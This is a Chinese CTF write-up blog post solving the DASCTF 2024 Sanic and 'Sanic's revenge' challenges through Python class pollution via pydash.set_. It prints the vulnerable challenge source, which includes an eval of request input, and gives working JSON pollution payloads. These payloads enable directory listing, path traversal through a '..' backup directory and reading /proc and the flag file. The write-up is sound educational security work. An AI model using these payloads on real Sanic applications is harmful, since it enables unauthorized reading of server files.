class="hljs-comment">#</span><br><span class="hljs-comment">#</span><br><span class="hljs-comment"># @app.route(&quot;/login&quot;)</span><br><span class="hljs-comment"># async def login(request):</span><br><span class="hljs-comment">#     user = request.cookies.get(&quot;user&quot;)</span><br><span class="hljs-comment">#     if user.lower() == &#x27;adm;n&#x27;:</span><br><span class="hljs-comment">#         request.ctx.session[&#x27;admin&#x27;] = True</span><br><span class="hljs-comment">#         return text(&quot;login success&quot;)</span><br><span class="hljs-comment">#</span><br><span class="hljs-comment">#     return text(&quot;login fail&quot;)</span><br><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/src&quot;</span></span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">src</span>(<span class="hljs-params">request</span>):<br>    <span class="hljs-built_in">eval</span>(request.args.get(<span class="hljs-string">&quot;code&quot;</span>))<br>    <span class="hljs-keyword">return</span> text(<span class="hljs-built_in">open</span>(__file__).read())<br><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/admin&quot;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">admin</span>(<span class="hljs-params">request</span>):<br>    <span class="hljs-comment">#if request.ctx.session.get(&#x27;admin&#x27;) == True:</span><br>    key = request.json[<span class="hljs-string">&#x27;key&#x27;</span>]<br>    value = request.json[<span class="hljs-string">&#x27;value&#x27;</span>]<br>    <span class="hljs-keyword">if</span> key <span class="hljs-keyword">and</span> value <span class="hljs-keyword">and</span> <span class="hljs-built_in">type</span>(key) <span class="hljs-keyword">is</span> <span class="hljs-built_in">str</span> <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;_.&#x27;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> key:<br>        pollute = Pollute()<br>        pydash.set_(pollute, key, value)<br>        <span class="hljs-keyword">return</span> text(<span class="hljs-string">&quot;success&quot;</span>)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">return</span> text(<span class="hljs-string">&quot;forbidden&quot;</span>)<br><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    app.run(host=<span class="hljs-string">&#x27;0.0.0.0&#x27;</span>)<br></code></pre></td></tr></table></figure>
<p>执行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">/src?code=<span class="hljs-built_in">print</span>(app.router.name_index)<br></code></pre></td></tr></table></figure>
<p><img src="/../../images/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/2.png" srcset="/img/loading.gif" lazyload alt="2"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">/src?code=<span class="hljs-built_in">print</span>(app.router.name_index[<span class="hljs-string">&#x27;__mp_main__.static&#x27;</span>])<br></code></pre></td></tr></table></figure>
<p><img src="/../../images/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/3.png" srcset="/img/loading.gif" lazyload alt="3"></p>
<p>成功获取到这个路由，接下来是调用到DirectoryHandler里</p>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs arduino">__mp_main__.<span class="hljs-type">static</span><br></code></pre></td></tr></table></figure>
<p>可以全局搜索下name_index这个方法，打个断点看一下</p>
<p><img src="/../../images/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/1.png" srcset="/img/loading.gif" lazyload alt="1"></p>
<p>对<code>handler.keywords.directory_handler.directory_view</code>进行污染</p>
<p>构造</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;True&quot;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>
<p>注意这里不能用[]来包裹其中的索引，污染和直接调用不同，我们需要用.来连接，然后访问/static/就行</p>
<p>接下来是污染directory，directory是一个对象，而它之前的值就是由其中的<strong>parts</strong>属性决定的，但是由于这个属性是一个tuple，不能直接被污染</p>
<p><img src="/../../images/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/4.png" srcset="/img/loading.gif" lazyload alt="4"></p>
<p>parts的值最后是给了_parts这个属性(按照之前的跟进)，污染成根目录</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory._parts&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span><span class="hljs-string">&quot;/&quot;</span><span class="hljs-punctuation">]</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>
<p>到这做题就差不多了，直接打两个payload读取，将flag污染到根目录就行。</p>
<h1 id="dasctf-2024-暑假暑期挑战赛sanics-revenge"><a class="markdownIt-Anchor" href="#dasctf-2024-暑假暑期挑战赛sanics-revenge"></a> [DASCTF 2024 暑假暑期挑战赛]Sanic’s revenge</h1>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> sanic <span class="hljs-keyword">import</span> Sanic<br><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">from</span> sanic.response <span class="hljs-keyword">import</span> text, html<br><span class="hljs-keyword">import</span> sys<br><span class="hljs-keyword">import</span> random<br><span class="hljs-keyword">import</span> pydash<br><span class="hljs-comment"># pydash==5.1.2</span><br><br><span class="hljs-comment"># 这里的源码好像被admin删掉了一些，听他说里面藏有大秘密</span><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Pollute</span>:<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self</span>):<br>        <span class="hljs-keyword">pass</span><br><br>app = Sanic(__name__)<br>app.static(<span class="hljs-string">&quot;/static/&quot;</span>, <span class="hljs-string">&quot;./static/&quot;</span>)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/*****secret********&quot;</span></span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">secret</span>(<span class="hljs-params">request</span>):<br>    secret=<span class="hljs-string">&#x27;**************************&#x27;</span><br>    <span class="hljs-keyword">return</span> text(<span class="hljs-string">&quot;can you find my route name ???&quot;</span>+secret)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>(<span class="hljs-params">request</span>):<br>    <span class="hljs-keyword">return</span> html(<span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;static/index.html&#x27;</span>).read())<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/pollute&quot;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">POLLUTE</span>(<span class="hljs-params">request</span>):<br>    key = request.json[<span class="hljs-string">&#x27;key&#x27;</span>]<br>    value = request.json[<span class="hljs-string">&#x27;value&#x27;</span>]<br>    <span class="hljs-keyword">if</span> key <span class="hljs-keyword">and</span> value <span class="hljs-keyword">and</span> <span class="hljs-built_in">type</span>(key) <span class="hljs-keyword">is</span> <span class="hljs-built_in">str</span> <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;parts&#x27;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> key <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;proc&#x27;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> <span class="hljs-built_in">str</span>(value) <span class="hljs-keyword">and</span> <span class="hljs-built_in">type</span>(value) <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-built_in">list</span>:<br>        pollute = Pollute()<br>        pydash.set_(pollute, key, value)<br>        <span class="hljs-keyword">return</span> text(<span class="hljs-string">&quot;success&quot;</span>)<br>    <span class="hljs-keyword">else</span>:<br>        log_dir = create_log_dir(<span class="hljs-number">6</span>)<br>        log_dir_bak = log_dir + <span class="hljs-string">&quot;..&quot;</span><br>        log_file = <span class="hljs-string">&quot;/tmp/&quot;</span> + log_dir + <span class="hljs-string">&quot;/access.log&quot;</span><br>        log_file_bak = <span class="hljs-string">&quot;/tmp/&quot;</span> + log_dir_bak + <span class="hljs-string">&quot;/access.log.bak&quot;</span><br>        log = <span class="hljs-string">&#x27;key: &#x27;</span> + <span class="hljs-built_in">str</span>(key) + <span class="hljs-string">&#x27;|&#x27;</span> + <span class="hljs-string">&#x27;value: &#x27;</span> + <span class="hljs-built_in">str</span>(value);<br>        <span class="hljs-comment"># 生成日志文件</span><br>        os.system(<span class="hljs-string">&quot;mkdir /tmp/&quot;</span> + log_dir)<br>        <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(log_file, <span class="hljs-string">&#x27;w&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>            f.write(log)<br>        <span class="hljs-comment"># 备份日志文件</span><br>        os.system(<span class="hljs-string">&quot;mkdir /tmp/&quot;</span> + log_dir_bak)<br>        <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(log_file_bak, <span class="hljs-string">&#x27;w&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>            f.write(log)<br>        <span class="hljs-keyword">return</span> text(<span class="hljs-string">&quot;！！！此地禁止胡来，你的非法操作已经被记录！！！&quot;</span>)<br><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    app.run(host=<span class="hljs-string">&#x27;0.0.0.0&#x27;</span>)<br></code></pre></td></tr></table></figure>
<p>书接上回，也做一下revenge，先打一发</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;True&quot;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>
<p>由于过滤了parts不能直接打</p>
<p>接着之前的继续跟进</p>
<p>当我们开启列目录功能后，就会进入,跟进<code>_index</code></p>
<p><img src="/../../images/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/5.png" srcset="/img/loading.gif" lazyload alt="5"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">_index</span>(<span class="hljs-params">self, location: Path, path: <span class="hljs-built_in">str</span>, debug: <span class="hljs-built_in">bool</span></span>):<br>       <span class="hljs-comment"># Remove empty path elements, append slash</span><br>       <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;//&quot;</span> <span class="hljs-keyword">in</span> path <span class="hljs-keyword">or</span> <span class="hljs-keyword">not</span> path.endswith(<span class="hljs-string">&quot;/&quot;</span>):<br>           <span class="hljs-keyword">return</span> redirect(<br>               <span class="hljs-string">&quot;/&quot;</span> + <span class="hljs-string">&quot;&quot;</span>.join([<span class="hljs-string">f&quot;<span class="hljs-subst">&#123;p&#125;</span>/&quot;</span> <span class="hljs-keyword">for</span> p <span class="hljs-keyword">in</span> path.split(<span class="hljs-string">&quot;/&quot;</span>) <span class="hljs-keyword">if</span> p])<br>           )<br></code></pre></td></tr></table></figure>
<p>列出的目录路径就是由self.directory(值是其中的parts控制的)+current拼接得到的</p>
<p>如果污染current就可以实现目录穿越</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">current = path.strip(<span class="hljs-string">&quot;/&quot;</span>)[<span class="hljs-built_in">len</span>(<span class="hljs-variable language_">self</span>.base) :].strip(<span class="hljs-string">&quot;/&quot;</span>) <br></code></pre></td></tr></table></figure>
<p>处理一个路径字符串 <code>path</code>，去除路径两端的斜杠 <code>/</code> 后，截取出与 <code>self.base</code> 无关的部分。首先，通过 <code>strip(&quot;/&quot;)</code> 去除路径两端的斜杠，然后根据 <code>self.base</code> 的长度，去掉路径中前面与 <code>self.base</code> 长度相同的部分，最后再次去掉截取后路径两端的斜杠。最终，得到的是去掉了 <code>self.base</code> 部分并且去除掉两端斜杠的路径子串</p>
<p>current的值就是由path和base两个值决定的。</p>
<p>访问static路由时，这里path的值是/static/</p>
<p>可以创建一个ctf的目录</p>
<p>此时path为/static/ctf…/，base为static，控制base为static/ctf，可以让current为…,类似这样</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python">path=<span class="hljs-string">&quot;/static/tmp/aaa..&quot;</span><br>base=<span class="hljs-string">&quot;static/tmp/aaa&quot;</span><br>current = path.strip(<span class="hljs-string">&quot;/&quot;</span>)[<span class="hljs-built_in">len</span>(base) :].strip(<span class="hljs-string">&quot;/&quot;</span>)<br><span class="hljs-built_in">print</span>(current)<br></code></pre></td></tr></table></figure>
<p>file_or_directory类似flask中的_static_url_path，可以改变静态文件的默认路径，我们只需要通过这个改变到其他目录</p>
<hr>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.file_or_directory&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;/&quot;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>
<p>直接读<code>proc/1/environ</code>为假的flag,看一下，<code>proc/1/cmdline</code>,再进sh看一下完整目录</p>
<p><img src="/../../images/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/6.png" srcset="/img/loading.gif" lazyload alt="6"></p>
<p><code> /app/2Q17A58T9F65y5i8.py</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> sanic <span class="hljs-keyword">import</span> Sanic<br><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">from</span> sanic.response <span class="hljs-keyword">import</span> text, html<br><span class="hljs-keyword">import</span> sys<br><span class="hljs-keyword">import</span> random<br><span class="hljs-keyword">import</span> pydash<br><span class="hljs-comment"># pydash==5.1.2</span><br><br><span class="hljs-comment">#源码好像被admin删掉了一些，听他说里面藏有大秘密</span><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Pollute</span>:<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self</span>):<br>        <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">create_log_dir</span>(<span class="hljs-params">n</span>):<br>        ret = <span class="hljs-string">&quot;&quot;</span><br>        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(n):<br>            num = random.randint(<span class="hljs-number">0</span>, <span class="hljs-number">9</span>)<br>            letter = <span class="hljs-built_in">chr</span>(random.randint(<span class="hljs-number">97</span>, <span class="hljs-number">122</span>))<br>            Letter = <span class="hljs-built_in">chr</span>(random.randint(<span class="hljs-number">65</span>, <span class="hljs-number">90</span>))<br>            s = <span class="hljs-built_in">str</span>(random.choice([num, letter, Letter]))<br>            ret += s<br>        <span class="hljs-keyword">return</span> ret<br>        <br>app = Sanic(__name__)<br>app.static(<span class="hljs-string">&quot;/static/&quot;</span>, <span class="hljs-string">&quot;./static/&quot;</span>)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/Wa58a1qEQ59857qQRPPQ&quot;</span></span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">secret</span>(<span class="hljs-params">request</span>):<br>    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;/h111int&quot;</span>,<span class="hljs-string">&#x27;r&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>       hint=f.read()<br>    <span class="hljs-keyword">return</span> text(hint)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>(<span class="hljs-params">request</span>):<br>    <span class="hljs-keyword">return</span> html(<span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;static/index.html&#x27;</span>).read())<br>   <br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/adminLook&quot;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>]</span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">AdminLook</span>(<span class="hljs-params">request</span>):<br>    <span class="hljs-comment">#方便管理员查看非法日志</span><br>    log_dir=os.popen(<span class="hljs-string">&#x27;ls /tmp -al&#x27;</span>).read();<br>    <span class="hljs-keyword">return</span> text(log_dir)<br>    <br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&quot;/pollute&quot;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">def</span> <span class="hljs-title function_">POLLUTE</span>(<span class="hljs-params">request</span>):<br>    key = request.json[<span class="hljs-string">&#x27;key&#x27;</span>]<br>    value = request.json[<span class="hljs-string">&#x27;value&#x27;</span>]<br>    <span class="hljs-keyword">if</span> key <span class="hljs-keyword">and</span> value <span class="hljs-keyword">and</span> <span class="hljs-built_in">type</span>(key) <span class="hljs-keyword">is</span> <span class="hljs-built_in">str</span> <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;parts&#x27;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> key <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;proc&#x27;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> <span class="hljs-built_in">str</span>(value) <span class="hljs-keyword">and</span> <span class="hljs-built_in">type</span>(value) <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-built_in">list</span>:<br>        pollute = Pollute()<br>        pydash.set_(pollute, key, value)<br>        <span class="hljs-keyword">return</span> text(<span class="hljs-string">&quot;success&quot;</span>)<br>    <span class="hljs-keyword">else</span>:<br>        log_dir=create_log_dir(<span class="hljs-number">6</span>)<br>        log_dir_bak=log_dir+<span class="hljs-string">&quot;..&quot;</span><br>        log_file=<span class="hljs-string">&quot;/tmp/&quot;</span>+log_dir+<span class="hljs-string">&quot;/access.log&quot;</span><br>        log_file_bak=<span class="hljs-string">&quot;/tmp/&quot;</span>+log_dir_bak+<span class="hljs-string">&quot;/access.log.bak&quot;</span><br>        log=<span class="hljs-string">&#x27;key: &#x27;</span>+<span class="hljs-built_in">str</span>(key)+<span class="hljs-string">&#x27;|&#x27;</span>+<span class="hljs-string">&#x27;value: &#x27;</span>+<span class="hljs-built_in">str</span>(value);<br>        <span class="hljs-comment">#生成日志文件</span><br>        os.system(<span class="hljs-string">&quot;mkdir /tmp/&quot;</span>+log_dir)<br>        <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(log_file, <span class="hljs-string">&#x27;w&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>             f.write(log)<br>        <span class="hljs-comment">#备份日志文件</span><br>        os.system(<span class="hljs-string">&quot;mkdir /tmp/&quot;</span>+log_dir_bak)<br>        <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(log_file_bak, <span class="hljs-string">&#x27;w&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>             f.write(log)<br>        <span class="hljs-keyword">return</span> text(<span class="hljs-string">&quot;！！！此地禁止胡来，你的非法操作已经被记录！！！&quot;</span>)<br><br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    app.run(host=<span class="hljs-string">&#x27;0.0.0.0&#x27;</span>)<br></code></pre></td></tr></table></figure>
<p>看一下多出来的路由</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver">flag <span class="hljs-keyword">in</span> /app,but you need <span class="hljs-built_in">to</span> find his name！！！<br>Find <span class="hljs-keyword">a</span> way <span class="hljs-built_in">to</span> see <span class="hljs-keyword">the</span> <span class="hljs-built_in">file</span> names <span class="hljs-keyword">in</span> <span class="hljs-keyword">the</span> app <span class="hljs-built_in">directory</span><br></code></pre></td></tr></table></figure>
<p><code>/adminLook</code>，看一下</p>
<p>可以看到这里存在两个目录，一个备份目录名称为<code>z7LD0H..</code>，那么就可以利用访问这个目录实现穿越到上层目录</p>
<p>先污染<strong>file_or_directory</strong>为tmp目录</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.file_or_directory&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;/tmp&quot;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>
<p>污染base的值</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;key&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.base&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;value&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;static/z7LD0H&quot;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>
<p><img src="/../../images/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/7.png" srcset="/img/loading.gif" lazyload alt="7"></p>
<p>在<code>/app/45W698WqtsgQT1_flag</code>中，最后读取一下就行了(不知道电脑出什么问题，第二个打断点老是显示不出来)</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%AF%8F%E6%97%A5%E4%B8%80%E9%A2%98/" class="category-chain-item">每日一题</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Sanic/" class="print-no-link">#Sanic</a>
      
        <a href="/tags/python%E6%B1%A1%E6%9F%93%E9%93%BE/" class="print-no-link">#python污染链</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Sanic&amp;revenge</div>
      <div>https://0ran9ewww.github.io/2025/01/15/每日一题/Sanic&amp;revenge/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>orange</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年1月15日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2025年1月15日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/01/18/%E6%B8%97%E9%80%8F/Fowsniff/" title="THM-Fowsniff">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">THM-Fowsniff</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/01/12/ctfshow/ctfshow2025%E6%B8%97%E9%80%8F%E8%B5%9B%E5%A4%8D%E7%8E%B0/" title="ctfshow2025渗透赛复现">
                        <span class="hidden-mobile">ctfshow2025渗透赛复现</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      

    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  

